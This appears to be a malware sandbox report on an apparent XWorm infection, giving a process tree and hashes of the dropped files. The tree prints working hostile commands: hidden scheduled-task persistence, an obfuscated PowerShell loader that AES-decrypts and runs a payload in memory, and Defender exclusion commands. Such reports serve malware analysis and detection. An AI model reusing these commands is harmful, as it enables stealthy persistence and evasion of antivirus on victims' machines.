C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_810_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_810.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_810.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_810.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Users\Admin\AppData\Roaming\startup_str_810.bat.exe"startup_str_810.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_810.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))6⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_810')7⤵
- Suspicious behavior: EnumeratesProcesses
PID:228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\startup_str_810.bat'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'startup_str_810.bat.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1120 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 35047⤵
- Program crash
PID:1988 -
C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"2⤵
- Executes dropped EXE
PID:1836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2712 -ip 27121⤵PID:3096
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD575c4145f77ef3a29e5b3367469280498
SHA1a067727aa790e68a853faf535583a0556c9971b3
SHA256c6b41847a68cc3bc665e55ce886ed74caf99386c6d9b1cc1fd6b3afe07e813ce
SHA5129b72df18130b56c8f4c83b81976b666718904fc94fd28ca6484901ef188b2a9bb8d6534793a8fde511f2fb05c9085f675b35c6e6dfcdc4c1899f16f10f1267e2
-
Filesize
20KB
MD5ecd5a03e096872cb7895a677ba7f8b1a
SHA151ae21bbc273b45875f5b93558157851180e2d93
SHA256a90deb215b4bf9961cc5f9cd7c1ff9a02e9dbc6ab35d43a39c00f20bc02f7bc5
SHA512d902dcef787eb848f474145d61ddaa6dc233bedd600855347094fc885e1dbee426bff2f9ff6230bbb7e99c75e074b9e371de984cc7b38d004ae3032e7c8010b9
-
Filesize
21KB
MD5c47059e7fc3cb1098f917aac052b57c5
SHA1c3632831986d64bb3175f9b9b4485d61f7cef5e8
SHA2561a0abed94dc321737d8acdb3c33f647d0d8edc04fa43349689994397a41c9d5e
SHA512fed652583b8fb9e51595c5c5336df3282da497e436e0ae0ae474820497ae4b1f0667e5f1e26bbdeaafc2504cc66ed5083ff84356fa3a404fd3c1d9cb63a02224
-
Filesize
17KB
MD52f1743f9c6277ceb85951a7004b057d5
SHA18a10cb3e53751e94d65f5953e5f226b24c582a96
SHA256a737ab07c95cacb491d0c416de7199d17db78ebfd55a4a4dbb6e091f5ef0c78d
SHA51280dbdae50f90fbc78598645b98d86d457f9b1c1c069eff63ae129677bec4c0801297c9eaf89500141c042890a57efdd0acae4a0d60d7645a59e9b527a04b2485
-
Filesize
20KB
MD52c738123c1bc5db7dd2df5bbf7dbea49
SHA1fac5dc9b23b1ec54873f985d88be43406beaa9e7
SHA256a18fddf68434cdda41652fbe533089340f74883252ba35cb8a92d044ea584067
SHA51204a98bcb2d120cde6beccbb65a92e504c78243fe44b6eaeb02c4861a3413f31dce240b4779e600ecda06b5db9f1e3aa91bbdb361a9aa27653edd508a2bb93d35
-
Filesize
18KB
MD5b1798c6339cbbb05ffdfabdd27e2d60a
SHA167789e14e1b7b4312186e23b95cc9d3303bcced0
SHA256767303ea31446fe4f81ba8745bc0f7c2d36bd957d531e815258bccf6b13c6251
SHA5122a905a028eb00364c3208e904e04bd01902249daa275fd556c9face9d6276e01d412e231eddf08c8469ad0ddec83384153ced194ec2edf7b332e98bf9b3d619f
-
Filesize
18KB
MD5e5123e738a140454877939e152d25873
SHA19f5a93bb2bac256cd4d898dd5f51963d2b1e7f1f
SHA256d001687ac2d1ebdd16dc8fb06bb9a8c05ec0948525cf9a25cadf75a08c22ed2a
SHA512d8b0fbf1599baff4f1c78fe40230239490daaba639ed994bff704c6a7029c70103ed20f37a58e3980e7c16f792c8047a46b5190073e75f6c041c7ff24a79cb58
-
Filesize
18KB
MD57a5684d845171efc3f76350dddb89e59
SHA1a82302a9341337825e9f25049ee779b8733f8278
SHA256945cbd7198d5250833df81cd27e7a30d37a2823c701f920b4c170df4293b22a7
SHA5126d11aceda0932b73a1b0c03061827c97604d474929363563fd76beb9a9efd34a9f7cc04119999601f1089065a4a89d943da96283df14b5f0f32870ed1da87c34
-
Filesize
25KB
MD5c63c30bf8d711cd6834a5b1a0c24404c
SHA1b96ad69bbba63a39398c30f51bc554eefa3b1518
SHA25665a75c448575948b268c8220f1a7d4f028544bb8de8f3613fff3474cd5f74cb3
SHA512f9eb46c55c621d02ad7785175f30babaa38d6aad4c85f0f5fd41a9fa877441941a26995c320b976cb99429496daca6908cea2b56eaa29b60397a11b80d3da66d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
46KB
MD58f5942354d3809f865f9767eddf51314
SHA120be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218
-
Filesize
100KB
MD57e58c37fd1d2f60791d5f890d3635279
SHA15b7b963802b7f877d83fe5be180091b678b56a02
SHA256df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7
SHA512a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
96KB
MD5d367ddfda80fdcf578726bc3b0bc3e3c
SHA123fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA2560b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA51240e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77
-
Filesize
14.9MB
MD556ccb739926a725e78a7acf9af52c4bb
SHA15b01b90137871c3c8f0d04f510c4d56b23932cbc
SHA25690f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405
SHA5122fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1
-
Filesize
115B
MD51e1fb4978be450626368735642b24cf6
SHA14648de013017c5cbd173da217de6ba6f8daffe13
SHA256225be32b3cb44f61d848b16e6304c1675c55582cd222d28ad8713b755f712d3b
SHA512ecb0ef101c02369daddaab4fe2ea8bf970b2b25887c16e944ebf29681f38376d0e24aca19e1258ff1544394e3b6c95d5565c29aee3ba94f4188f9a0c114cc50a
-
Filesize
115B
MD58add26512730c8e2a8a81a310074e3ab
SHA1c56304923ea7d5996fc9b905edd80f4b49b6c101
SHA2562f94e63e575f2d9feb58d719da8084c0c70269ee5cc138266a74d4924e791264
SHA512e5d197f3842ed97b3828531f29ba0222a7f92103da1bddd5bf257b868af91aa8245726b4cc478df153672cc7ae54bfc6be3717283b2009358c35f918d47abc3b
-
Filesize
304KB
MD528a668375e0d2b1cfa1d847fc44934d4
SHA1bd0d7df2f07f879e97e02d13d9eebf0a584fabe7
SHA256cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160
SHA512d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c
-
Filesize
317KB
MD5ada0b01d33911547bb0086e0ed152484
SHA1ec81374c631f94c536b51dfb8c42c063bf72ca78
SHA256aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1
SHA5126aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc